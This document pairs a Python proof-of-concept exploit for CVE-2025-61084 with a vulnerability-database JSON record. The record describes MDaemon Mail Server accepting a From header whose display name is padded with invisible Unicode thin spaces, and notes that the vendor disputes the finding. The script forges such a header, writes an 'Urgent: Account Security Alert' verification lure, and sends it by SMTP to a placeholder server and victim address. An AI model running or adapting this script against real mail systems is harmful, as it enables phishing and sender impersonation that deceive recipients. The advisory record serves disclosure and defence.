CVE-2025-61084

# CVE-2025-61084 PoC - MDaemon Unicode Space Email Spoofing # This PoC demonstrates how invisible Unicode thin spaces can bypass SPF/DKIM/DMARC validation import smtplib from email.mime.text import MIMEText from email.header import Header def create_spoofed_email(): # Unicode thin space (U+2009) - invisible character thin_space = '\u2009' # Crafted From header that displays legitimate sender but actually from attacker # The server validates '[email protected]' but client displays '[email protected]' spoofed_display_name = '[email protected]' + (thin_space * 10) # From header format: Display Name <[email protected]> from_header = f'{spoofed_display_name} <[email protected]>' msg = MIMEText('Your account requires verification.', 'plain', 'utf-8') msg['From'] = from_header msg['To'] = '[email protected]' msg['Subject'] = Header('Urgent: Account Security Alert', 'utf-8') return msg def send_spoofed_email(smtp_server, smtp_port, from_addr, to_addr): msg = create_spoofed_email() try: with smtplib.SMTP(smtp_server, smtp_port) as server: server.starttls() # Attacker controls this address which passes validation server.sendmail(from_addr, [to_addr], msg.as_string()) print(f'[+] Spoofed email sent successfully') print(f'[+] From displayed: [email protected]') print(f'[+] From validated: [email protected]') except Exception as e: print(f'[-] Error: {e}') if __name__ == '__main__': # Target MDaemon mail server TARGET = 'vulnerable-mdaemon-server.com' PORT = 25 # Attacker controlled email that passes validation ATTACKER_EMAIL = '[email protected]' VICTIM_EMAIL = '[email protected]' send_spoofed_email(TARGET, PORT, ATTACKER_EMAIL, VICTIM_EMAIL)

{"cve": {"id": "CVE-2025-61084", "sourceIdentifier": "[email protected]", "published": "2025-11-05T15:15:39.997", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [{"sourceIdentifier": "[email protected]", "tags": ["disputed"]}], "descriptions": [{"lang": "en", "value": "MDaemon Mail Server 23.5.2 validates SPF, DKIM, and DMARC using the email enclosed in angle brackets (<>) in the From: header of SMTP DATA. An attacker can craft a From: header with multiple invisible Unicode thin spaces to display a spoofed sender while passing validation, allowing email spoofing even when anti-spoofing protections are in place. NOTE: this is disputed by the Supplier because UI spoofing occurs in a client, not in a server such as MDaemon's product or any other server implementation. Also, if a client without its own spoofing protection must be used, the Header Screening feature in MDaemon's product can be employed to mitigate the client-side vulnerability."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 4.2}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-20"}, {"lang": "en", "value": "CWE-116"}]}], "references": [{"url": "https://github.com/x00nullbit/CVE-References/blob/main/CVE-2025-61084/README.md", "source": "[email protected]"}]}}